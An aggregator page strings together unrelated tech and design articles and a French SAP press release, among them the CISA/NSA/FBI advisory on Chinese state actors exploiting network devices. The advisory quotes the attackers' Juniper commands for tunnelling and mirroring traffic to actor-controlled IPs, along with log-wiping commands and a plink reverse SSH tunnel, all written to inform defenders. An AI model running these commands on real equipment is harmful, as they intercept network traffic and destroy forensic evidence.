But currently, each cloud vendor has its workflow solution. AWS has Step Functions, Google has Google Workflows, Microsoft has Azure Durable functions, and so on. The lack of a common way to define workflows becomes an issue when you need to migrate or host your applications on more than one cloud vendor. It also limits the potential for creating tools and infrastructures that support several platforms. This is what the Serverless Workflow specification addresses.
Source de l’article sur DZONE
Perfect CTA Placement: Above-The-Fold Vs. Below-The-Fold
Actualités, ActualitésAs a website designer, your professional life revolves around crucial questions that might help you to deliver better results for your clients.
Which widgets are essential to driving conversions? What kind of checkout page elements do you need to include? Should there be a video or slideshow on that product page?
One of the biggest queries that we face when building landing pages to encourage sales is whether a CTA (call to action) button needs to be above or below the fold.
Answering the question: “Where should the CTA go?” correctly could make or break your client’s chances of a sale. Unfortunately, this particular concern has been the source of a raging debate for many years now. Everyone has their own opinion about CTAs and where they belong.
Today, we’re going to cover the benefits and issues with placing a CTA above the fold.
Should You Place a CTA Above the Fold?
Starting with a quick refresher, the term “above the fold” refers to any area of a website seen on a screen when a user arrives on a webpage. The content that appears above and below the fold may differ depending on the device you’re visiting a website with.
Experts in the design and digital marketing world have frequently claimed that if you want to get the best results with a CTA, you need to place it above the fold.
This strategy makes a lot of sense. If your CTA is above the fold, then your chances of it being seen are significantly higher. Some customers might not want to scroll to the bottom of a page to find out what they need to do next in their buyer journey.
Additionally, according to the NN group, the 100 pixels that appeared above the fold were seen 102% more often than the pixels underneath the fold. Eye-tracking technology learned that more often than not, you’ll get more engagement above the fold.
Just look at this landing page from Lyft, for instance, you immediately see what you need to do next:
It’s not just a single study that has touted the benefits of an above-the-fold CTA, either.
Another report into the “importance of being seen” found that above-the-fold ads and CTAs had a 73% rate of visibility compared to only 44% for those below the fold.
So, with stats like that to think about, why would you ever consider using a below-the-fold CTA?
When to Place a CTA Below the Fold
As with most things in web design, there is an exception to the rule.
Yes, above the fold, CTAs will be better for you most of the time. However, there are times when you might need to think outside of the box.
Most people think that placing a CTA below the fold practically guarantees that it won’t be seen. However, if you’re creating a website page or landing page that includes a lot of vital information, your audience will need to scroll.
For instance, if you’re creating a page where someone can download an app to engage with a business they already know about, it makes sense to speed the journey along with an above-the-fold CTA. However, if you’re trying to convince someone to sign up for your webinar, you might need to tell them what that webinar is all about first. That’s where a below-the-fold CTA comes in handy.
Customers might not have a lot of time in their busy schedules for scrolling these days. However, they still need the right information before they can make a decision about what to do next with your brand. According to Marketing Experiments, below the fold, CTA buttons can result in a 20% increase in conversions. However, this conversion boost only happens when you’re providing valuable, engaging, and persuasive content.
Check out this example from the Boston Globe, for instance:
The Fold Isn’t Everything in Web Design
The fold is often an essential consideration in web design.
However, it’s not all you need to think about when you’re deciding where to place sign-up forms and valuable CTA buttons.
According to the Nielsen Norman group, the content that appears at the top of the page will always influence user experience. However, that doesn’t mean that you need to place your CTA there. What you do need to do is ensure that whatever you have above the fold is promising enough to engage your visitor and make them scroll.
Put simply, what’s above and below the fold does matter, but your focus should be on taking advantage of customer motivation, rather than worrying exclusively about an imaginary line.
When deciding where a CTA belongs, you need to think about motivation.
How motivated is your prospect to click on a button? How desirable is your offering at that time, and how much does your visitor already know about the thing they’re being offered?
If you’re going to need to provide more information before your customer wants to convert, then a below-the-fold CTA makes more sense.
If you’ve already provided all the information that your customer needs and a prospect is visiting from an advertisement or another page on the website, then above the fold should be exceptional.
The Truth About Designing for The Fold
The reality for web designers today is that achieving higher conversion rates doesn’t really have that much to do with whether a CTA is above or below the fold.
What’s important is whether your buttons come under the right amount of copy that answers the correct questions for an audience.
Remember, when visitors come to a website, they’re looking for different things. There are visitors that:
In some cases, you may even place multiple CTAs on the same page. Some people will have a general understanding of the technology and what it does. This means that they’ll be happy to click on the button at the top of the fold.
On the other hand, there could also be visitors arriving on the same page that don’t understand what the benefits of real-time personalization are. This means that you need to elaborate a little on what you have to offer. A simple one-line explanation isn’t enough here.
Figuring Out Where to Place a CTA
Deciding where to place different elements of a website is a common challenge for web designers. Despite tons of blogs out there, that claim “above the fold” is always the best option for any conversion rate optimization, the truth is a little more complicated.
The critical thing to remember as a web designer is that a CTA button asks a customer for commitment. Even if the CTA allows someone to download a free demo or sign-up for a newsletter without spending any money, it requires a customer to start a relationship with a brand.
In a world where customers are less trusting of companies than ever, it doesn’t make sense to push them into a relationship too quickly. Asking for a commitment from a target audience before they’ve had the chance to see what’s “in it for them” is not a good idea.
Jump in too quickly, and you’re likely to rub people the wrong way.
Go Out and Master the Fold
The issue for today’s designers isn’t figuring out whether a button needs to be visible from the moment someone arrives on a page. Instead, you need to think about whether visitors are finding the CTA at a time when they’re ready to take action.
You can only answer the question “where should the CTA go?” after you’ve carefully analyzed the project that you’re working on.
Remember, above the fold isn’t always the answer.
Featured image via Pexels.
Source
The post Perfect CTA Placement: Above-The-Fold Vs. Below-The-Fold first appeared on Webdesigner Depot.
Source de l’article sur Webdesignerdepot
How to Prevent Security Risks in the Private Cloud
Actualités, Méthodes et organisation des process ITOrganizations that want to use the cloud but don’t want to entrust their data to an external provider build their own on-premises cloud, also known as a private cloud. They build their own infrastructure, buy their own software, and build an in-house team to oversee everything. While the goal is to stay in control of your data, this technique is fraught with security threats and other pitfalls.
Haven’t you ever thought about migrating to the cloud? If you are already migrated to the environment of a private cloud, there are a few security risks in the private cloud that are found crucial.
Source de l’article sur DZONE
AA22-158A: People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’informationOriginal release date: June 7, 2022
Summary
Best Practices
• Apply patches as soon as possible
• Disable unnecessary ports and protocols
• Replace end-of-life infrastructure
• Implement a centralized patch management system
This joint Cybersecurity Advisory describes the ways in which People’s Republic of China (PRC) state-sponsored cyber actors continue to exploit publicly known vulnerabilities in order to establish a broad network of compromised infrastructure. These actors use the network to exploit a wide variety of targets worldwide, including public and private sector organizations. The advisory details the targeting and compromise of major telecommunications companies and network service providers and the top vulnerabilities—primarily Common Vulnerabilities and Exposures (CVEs)—associated with network devices routinely exploited by the cyber actors since 2020.
This joint Cybersecurity Advisory was coauthored by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). It builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal, and territorial (SLTT) government; critical infrastructure (CI), including the Defense Industrial Base (DIB); and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).
Entities can mitigate the vulnerabilities listed in this advisory by applying the available patches to their systems, replacing end-of-life infrastructure, and implementing a centralized patch management program.
NSA, CISA, and the FBI urge U.S. and allied governments, CI, and private industry organizations to apply the recommendations listed in the Mitigations section and Appendix A: Vulnerabilities to increase their defensive posture and reduce the risk of PRC state-sponsored malicious cyber actors affecting their critical networks.
For more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and Advisories webpage.
Click here for PDF.
Common vulnerabilities exploited by People’s Republic of China state-sponsored cyber actors
PRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. Network devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points to route command and control (C2) traffic and act as midpoints to conduct network intrusions on other entities. Over the last few years, a series of high-severity vulnerabilities for network devices provided cyber actors with the ability to regularly exploit and gain access to vulnerable infrastructure devices. In addition, these devices are often overlooked by cyber defenders, who struggle to maintain and keep pace with routine software patching of Internet-facing services and endpoint devices.
Since 2020, PRC state-sponsored cyber actors have conducted widespread campaigns to rapidly exploit publicly identified security vulnerabilities, also known as common vulnerabilities and exposures (CVEs). This technique has allowed the actors to gain access into victim accounts using publicly available exploit code against virtual private network (VPN) services [T1133] or public facing applications [T1190]—without using their own distinctive or identifying malware—so long as the actors acted before victim organizations updated their systems.
PRC state-sponsored cyber actors typically conduct their intrusions by accessing compromised servers called hop points from numerous China-based Internet Protocol (IP) addresses resolving to different Chinese Internet service providers (ISPs). The cyber actors typically obtain the use of servers by leasing remote access directly or indirectly from hosting providers. They use these servers to register and access operational email accounts, host C2 domains, and interact with victim networks. Cyber actors use these hop points as an obfuscation technique when interacting with victim networks.
These cyber actors are also consistently evolving and adapting tactics to bypass defenses. NSA, CISA, and the FBI have observed state-sponsored cyber actors monitoring network defenders’ accounts and actions, and then modifying their ongoing campaign as needed to remain undetected. Cyber actors have modified their infrastructure and toolsets immediately following the release of information related to their ongoing campaigns. PRC state-sponsored cyber actors often mix their customized toolset with publicly available tools, especially by leveraging tools that are native to the network environment, to obscure their activity by blending into the noise or normal activity of a network.
NSA, CISA, and the FBI consider the common vulnerabilities and exposures (CVEs) listed in Table 1 to be the network device CVEs most frequently exploited by PRC state-sponsored cyber actors since 2020.
Table 1: Top network device CVEs exploited by PRC state-sponsored cyber actors
Telecommunications and network service provider targeting
PRC state-sponsored cyber actors frequently utilize open-source tools for reconnaissance and vulnerability scanning. The actors have utilized open-source router specific software frameworks, RouterSploit and RouterScan [T1595.002], to identify makes, models, and known vulnerabilities for further investigation and exploitation. The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterScan is an open-source tool that easily allows for the scanning of IP addresses for vulnerabilities. These tools enable exploitation of SOHO and other routers manufactured by major industry providers, including Cisco, Fortinet, and MikroTik.
Upon gaining an initial foothold into a telecommunications organization or network service provider, PRC state-sponsored cyber actors have identified critical users and infrastructure including systems critical to maintaining the security of authentication, authorization, and accounting. After identifying a critical Remote Authentication Dial-In User Service (RADIUS) server, the cyber actors gained credentials to access the underlying Structured Query Language (SQL) database [T1078] and utilized SQL commands to dump the credentials [T1555], which contained both cleartext and hashed passwords for user and administrative accounts.
Having gained credentials from the RADIUS server, PRC state-sponsored cyber actors used those credentials with custom automated scripts to authenticate to a router via Secure Shell (SSH), execute router commands, and save the output [T1119]. These scripts targeted Cisco and Juniper routers and saved the output of the executed commands, including the current configuration of each router. After successfully capturing the command output, these configurations were exfiltrated off network to the actor’s infrastructure [TA0010]. The cyber actors likely used additional scripting to further automate the exploitation of medium to large victim networks, where routers and switches are numerous, to gather massive numbers of router configurations that would be necessary to successfully manipulate traffic within the network.
Armed with valid accounts and credentials from the compromised RADIUS server and the router configurations, the cyber actors returned to the network and used their access and knowledge to successfully authenticate and execute router commands to surreptitiously route [T1599], capture [T1020.001], and exfiltrate traffic out of the network to actor-controlled infrastructure.
While other manufacturers likely have similar commands, the cyber actors executed the following commands on a Juniper router to perform initial tunnel configuration for eventual exfiltration out of the network:
set chassis network-services all-ethernet
set interfaces <interface-id> unit <unit number> tunnel source <local network IP address>
set interfaces <interface-id> unit <unit number> tunnel destination <actor controlled IP address>
After establishing the tunnel, the cyber actors configured the local interface on the device and updated the routing table to route traffic to actor-controlled infrastructure.
set routing-options static route <local network IP address> next-hop <actor controlled IP address>
PRC state-sponsored cyber actors then configured port mirroring to copy all traffic to the local interface, which was subsequently forwarded through the tunnel out of the network to actor-controlled infrastructure.
set forwarding-options port-mirroring input rate 1
set forwarding-options port-mirroring family inet output interface <interface-id> next-hop <local network IP address>
set forwarding-options port-mirroring family inet output no-filter-check
set interfaces <interface-id> unit <unit number> family inet filter input <filter name>
set interfaces <interface-id> unit <unit number> family inet filter output <filter name>
Having completed their configuration changes, the cyber actors often modified and/or removed local log files to destroy evidence of their activity to further obfuscate their presence and evade detection.
sed -i -e ‘/<REGEX>/d’ <log filepath 2>
sed -i -e ‘/<REGEX>/d’ <log filepath 3>
rm -f <log filepath 4>
rm -f <log filepath 5>
rm -f <log filepath 6>
PRC state-sponsored cyber actors also utilized command line utility programs like PuTTY Link (Plink) to establish SSH tunnels [T1572] between internal hosts and leased virtual private server (VPS) infrastructure. These actors often conducted system network configuration discovery [T1016.001] on these host networks by sending hypertext transfer protocol (HTTP) requests to C2 infrastructure in order to illuminate the external public IP address.
plink.exe –N –R <local port>:<host 2>:<remote port> -pw <user defined password> -batch root@<VPS2> -P <remote SSH port>
Mitigations
NSA, CISA, and the FBI urge organizations to apply the following recommendations as well as the mitigation and detection recommendations in Appendix A, which are tailored to observed tactics and techniques. While some vulnerabilities have specific additional mitigations below, the following mitigations generally apply:
Resources
Refer to us-cert.cisa.gov/china, https://www.ic3.gov/Home/IndustryAlerts, and https://www.nsa.gov/cybersecurity-guidance for previous reporting on People’s Republic of China state-sponsored malicious cyber activity.
U.S. government and critical infrastructure organizations, should consider signing up for CISA’s cyber hygiene services, including vulnerability scanning, to help reduce exposure to threats.
U.S. Defense Industrial Base (DIB) organizations, should consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration. For more information on eligibility criteria and how to enroll in these services, email dib_defense@cyber.nsa.gov.
Additional References
Contact Information
To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov. To report computer intrusion or cybercrime activity related to information found in this advisory, contact your local FBI field office at www.fbi.gov/contact-us/field, or the FBI’s 24/7 Cyber Watch at 855-292-3937 or by email at CyWatch@fbi.gov. For NSA client requirements or general cybersecurity inquiries, contact Cybersecurity_Requests@nsa.gov.
Media Inquiries / Press Desk:
Disclaimer of endorsement
The information and opinions contained in this document are provided « as is » and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.
Purpose
This advisory was developed by NSA, CISA, and the FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
Appendix A: Vulnerabilities
Table 2: Information on Cisco CVE-2018-0171
Vulnerability Description
A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts: Triggering a reload of the device, Allowing the attacker to execute arbitrary code on the device, causing an indefinite loop on the affected device that triggers a watchdog crash.
Vulnerable Technologies and Versions
The vulnerability affects Cisco devices that are running a vulnerable release of Cisco IOS or IOS XE software and have the smart install client feature enabled. Only smart install client switches are affected by this vulnerability described in this advisory.
References
http://www.securityfocus.com/bid/103538
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04
https://ics-cert.us-cert.gov/advisories/ICSA-18-107-05
https://www.darkreading.com/perimeter/attackers-exploit-cisco-switch-issue-as-vendor-warns-of-yet-another-critical-flaw/d/d-id/1331490
http://www.securitytracker.com/id/1040580
Table 3: Information on Cisco CVE-2019-15271
Vulnerability Description
A vulnerability in the web-based management interface of certain Cisco Small Business RV Series Routers could allow an authenticated, remote attacker to execute arbitrary commands with root privileges. The attacker must have either a valid credential or an active session token. The vulnerability is due to lack of input validation of the HTTP payload. An attacker could exploit this vulnerability by sending a malicious HTTP request to the web-based management interface of the targeted device. A successful exploit could allow the attacker to execute commands with root privileges.
Vulnerable Technologies and Versions
This vulnerability affects the following Cisco Small Business RV Series Routers if they are running a firmware release earlier than 4.2.3.10:
References
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-sbrv-cmd-x
Table 4: Information on Cisco CVE-2019-1652
Vulnerability Description
A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands. The vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending malicious HTTP POST requests to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying Linux shell as root. Cisco has released firmware updates that address this vulnerability.
Vulnerable Technologies and Versions
This vulnerability affects Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers running firmware releases 1.4.2.15 through 1.4.2.20.
References
http://www.securityfocus.com/bid/106728
https://seclists.org/bugtraq/2019/Mar/55
https://www.exploit-db.com/exploits/46243/
https://www.exploit-db.com/exploits/46655/
http://seclists.org/fulldisclosure/2019/Mar/61
http://packetstormsecurity.com/files/152262/Cisco-RV320-Command-Injection.html
http://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject
Table 5: Information on Citrix CVE-2019-19781
Vulnerability Description
An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
Vulnerable Technologies and Versions
The vulnerability affects the following Citrix product versions on all supported platforms:
References
https://support.citrix.com/article/CTX267027
Table 6: Information on DrayTek CVE-2020-8515
Vulnerability Description
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.
References
https://draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
http://packetstormsecurity.com/files/156979/DrayTek-Vigor2960-Vigor3900-Vigor300B-Remote-Command-Execution.html
https://sku11army.blogspot.com/2020/01/draytek-unauthenticated-rce-in-draytek.html
Table 7: Information on D-Link CVE-2019-16920
Vulnerability Description
Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a « PingTest » device common gateway interface that could lead to common injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.
References
https://www.kb.cert.org/vuls/id/766427
https://fortiguard.com/zeroday/FG-VD-19-117
https://medium.com/@80vul/determine-the-device-model-affected-by-cve-2019-16920-by-zoomeye-bf6fec7f9bb3
https://www.seebug.org/vuldb/ssvid-98079
Table 8: Information on Fortinet CVE-2018-13382
Vulnerability Description
An Improper Authorization vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.8 and 5.4.1 to 5.4.10 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to modify the password of an SSL VPN web portal user via specially crafted HTTP requests.
Vulnerable Technologies and Versions
This vulnerability affects the following products:
FortiOS products are vulnerable only if the SSL VPN service (web-mode or tunnel-mode) is enabled and users with local authentication.
References
https://fortiguard.com/psirt/FG-IR-18-389
https://fortiguard.com/advisory/FG-IR-18-389
https://www.fortiguard.com/psirt/FG-IR-20-231
Table 9: Information on Mikrotik CVE-2018-14847
Vulnerability Description
MikroTik RouterOS through 6.42 allows unauthenticated remote attackers to read arbitrary files and remote authenticated attackers to write arbitrary files due to a directory traversal vulnerability in the WinBox interface.
Vulnerable Technologies and Versions
This vulnerability affected the following MikroTik products:
References
https://blog.mikrotik.com/security/winbox-vulnerability.html
Table 10: Information on Netgear CVE-2017-6862
Vulnerability Description
NETGEAR WNR2000v3 devices before 1.1.2.14, WNR2000v4 devices before 1.0.0.66, and WNR2000v5 devices before 1.0.0.42 allow authentication bypass and remote code execution via a buffer overflow that uses a parameter in the administration webapp. The NETGEAR ID is PSV-2016-0261.
Vulnerable Technologies and Versions
This vulnerability affects the following products:
References
https://kb.netgear.com/000038542/Security-Advisory-for-Unauthenticated-Remote-Code-Execution-on-Some-Routers-PSV-2016-0261
https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_netgear_wnr2000v5_-_cve-2017-6862.pdf
http://www.securityfocus.com/bid/98740
Table 11: Information on Pulse CVE-2019-11510
Vulnerability Description
In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability.
Detection Methods
Vulnerable Technologies and Versions
This vulnerability affects the following Pulse Connect Secure products:
References
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
Table 12: Information on Pulse CVE-2021-22893
Vulnerability Description
Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.
Vulnerable Technologies and Versions
This vulnerability affects Pulse Connect Secure 9.0R3/9.1R1 and higher.
References
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
https://blog.pulsesecure.net/pulse-connect-secure-security-update/
https://kb.cert.org/vuls/id/213092
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/
https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html
Table 13: Information on QNAP CVE-2019-7192
Vulnerability Description
This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.
Recommended Mitigations
Update Photo Station to versions:
Vulnerable Technologies and Versions
This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
Table 14: Information on QNAP CVE- 2019-7193
Vulnerability Description
This improper input validation vulnerability allows remote attackers to inject arbitrary code to the system. To fix the vulnerability, QNAP recommend updating QTS to their latest versions.
Recommended Mitigations
Update QTS to versions:
Vulnerable Technologies and Versions
This vulnerability affects QNAP QTS 4.3.6 and 4.4.1 or earlier.
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
Table 15: Information on QNAP CVE-2019-7194
Vulnerability Description
This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.
Recommended Mitigations
Update Photo Station to versions:
Vulnerable Technologies and Versions
This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
Table 16: Information on QNAP CVE-2019-7195
Vulnerability Description
This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.
Recommended Mitigations
Update Photo Station to versions:
Vulnerable Technologies and Versions
This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.
References
https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html
Table 17: Information on Zyxel CVE-2020-29583
Vulnerability Description
Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to login to the SSH server or web interface with admin privileges.
Vulnerable Technologies and Versions
This vulnerability affects the following technologies and versions:
References
http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
https://businessforum.zyxel.com/discussion/5252/zld-v4-60-revoke-and-wk48-firmware-release
https://businessforum.zyxel.com/discussion/5254/whats-new-for-zld4-60-patch-1-available-on-dec-15
https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
https://www.zyxel.com/support/CVE-2020-29583.shtml
https://www.zyxel.com/support/security_advisories.shtml
Revisions
This product is provided subject to this Notification and this Privacy & Use policy.
Source de l’article sur us-cert.gov
OpenTelemetry in Action: Optimizing Database Operations
Actualités, Méthodes et organisation des process ITMany software developers can attest that some of the most significant issues in their applications arise from database performance. Though many developers prefer to use a relational database for enterprise applications, typical logging and monitoring solutions provide limited signals to detect database performance issues. Rooting out common bad practices such as chatty interactions between the application code and the database is non-trivial.
As developers, we need to understand how our database is performing from the context of user transactions. Ideally, we would have a common tool that can monitor the performance of both the application and the database concerning user transactions. OpenTelemetry has emerged as a popular tool for application monitoring, but it can also be extended for monitoring databases.
Source de l’article sur DZONE
3 Essential Design Trends, June 2022
Actualités, ActualitésAre you bored with some of your current design projects? This month’s collection of website design trends can help break you out of that rut with some fun and funky alternatives.
And all of these options are anything but boring. From visual display to technique, these trends present a different set of challenges.
Here’s what’s trending in design this month.
1. Layers on Layers
These website designs have so many layers of information that you almost don’t know where to look or where the design elements start and stop.
This can be a complex technique to make work because of the number of elements competing for the same attention in the design.
What you are likely to see with this design tend includes an image or video background with some motion but not anything that truly demands attention. Then add on a few still images in smaller frames throughout the design. Layer on text as well for a three-deep effect.
If you interact with these designs, you’ll find that they are not flat either. They all include animated elements, hover states, and interactions that help direct you through the layers of what can be a somewhat complex design.
Western National Parks Association uses a background image, middle images with animations, and multiple text layers (some on the pictures and some on the background). There’s also scroll animation to help build the design. A lot is going on, but it does not feel too busy.
WIP Architects is another design with layers that interact with each other and include motion. With a lot of scroll animation and layers that go in front of and behind other elements, engagement helps this site work.
The Shipwreck Survey uses the same basic layer outline with a little more overlap between elements and less overall animation. The primary animated effect on the homepage is the scroll bar.
2. Directed Click Actions
This interesting website design trend can be incredibly useful or a wasted element – directed click actions. These are buttons, icons, and animations that tell you to click somewhere in the design to move to the next stage of interaction.
The direct approach ensures that users see and have the best possible chance of doing what the design is intended for. On the other hand, if you need this much instruction, is the design too complicated? Or is there a middle ground where this trend looks great and is usable?
In each of the examples below, these directed click actions are a bit different.
HUG Co has a big circle to click in the bottom third of the screen. It’s almost designed like a bullseye, and you can’t miss it. The thing that is interesting here is that most of the video falls below the scroll. The click action also has two emojis to denote action – a smiling face or pointer when you are ready to click. (The click extends the video to full screen.)
ThinkOvery also uses a similar circular click icon. It also takes you to the next screen in a single movement so that you can continue to explore the design.
Living with OCD has a different approach with scroll and back-to-top icons paired in the bottom right corner. The scroll option includes words to help create direction and instruction. It consists of a small animation and an interactive hover state when you get close to the interactive element. The interesting thing here is that it is not actually a button, and you use a traditional scroll to interact.
3. Word Breaks
If you are a stickler for readability, this design trend might make you cringe.
In each of these designs, words are broken across lines – some with and some without hyphens. For the most part, there’s not much confusion about what the words are, but it does make you pause and think during the page experience.
Why would this be a design trend?
It’s a combination of using large typography, long words, and figuring out a solution to create a common experience between large and small screens. Many of these words would not fit on mobile screens, for example, with the same weight, scale, and impact as the desktop counterparts.
Hence, the word break solution. It creates a consistent user experience across devices.
This technique should be used only if you think your audience is savvy enough to understand what you are trying to communicate with the word break. It can be a tricky proposition!
Plantarium breaks at “plant” with a word that’s made up. But with the imagery and supporting terms, you still know immediately what the design is about.
Michelle Beatty takes a common word and breaks it. Because “photog” and “rapher” are the only letters on the screen, it’s pretty easy to figure out. What’s interesting is that the word break is not on the syllable, but the letters do stack nicely with this break visually.
Wreel Collective breaks a word with a hyphen in giant letters – something we rarely see in website design. Hyphens are not often used in this medium. Because of this, it gets your attention and makes you think about the words and the design.
Conclusion
There are a lot of rule-breaking trends in this month’s collection. They are interesting, fun, and require a certain level of risk to execute.
Could you see yourself (or your clients) opting for a design that features one of these trends? Time will tell if these visual compositions grow in popularity or begin to fade fast.
Source
The post 3 Essential Design Trends, June 2022 first appeared on Webdesigner Depot.
Source de l’article sur Webdesignerdepot
SAP choisit le tandem Responsage-Tilia pour accompagner ses salariés aidants
Actualités, ERP & Applications, Ressources Humaines, SAPLevallois-Perret, le 2 juin 2021 — Responsage, service spécialisé dans le conseil et l’orientation des salariés aidants et Tilia, start-up dédiée à l’accompagnement des aidants soutenue par BNP Paribas Personal Finance, annoncent que SAP, leader du marché des logiciels d’application d’entreprise, a choisi leurs solutions pour accompagner et soulager ses collaborateurs aidants dans leur quotidien.
L’aidance : un sujet majeur de l’accord inter-générationnel de SAP
C’est dans le cadre de l’accord intergénérationnel signé en fin d’année que SAP a choisi d’accompagner ses salariés aidants avec les services de Responsage et Tilia.
« De plus en plus de salariés doivent prendre soin d’un parent âgé, d’un enfant ou d’un conjoint malade ou en situation de handicap, affirme Sandra Lotode, Directrice des relations sociales. Cela a donc été une évidence de proposer aux aidants, au sein de nos dispositifs de qualité de vie au travail, une solution qui les soulage et préserve l’équilibre vie privée/vie professionnelle. »
Responsage-Tilia : la réponse idéale à la problématique de l’aidance
Expert reconnu de l’accompagnement des salariés aidants depuis 2013, Responsage accompagne les salariés tout au long de leur parcours d’aidant : entretien téléphonique/visio pour hiérarchiser les problématiques, réponse écrite documentée en 3 jours ouvrés, calendrier de suivi personnalisé pour le montage des dossiers…. L’application Tilia offre un accès digital au service Responsage. De plus, Tilia assure la mise en œuvre et la coordination des différents prestataires nécessaires à la personne aidée.
« Le dispositif d’aide aux salariés aidants s’inscrit dans le volet social de la RSE, souligne Joël Riou, Président-Fondateur de Responsage. Soutenu par un accompagnement expert, le salarié préserve sa santé physique et mentale. Par ailleurs, grâce aux bilans anonymisés fournis par Responsage, SAP dispose d’une vision objectivée de la problématique dans l’entreprise. »
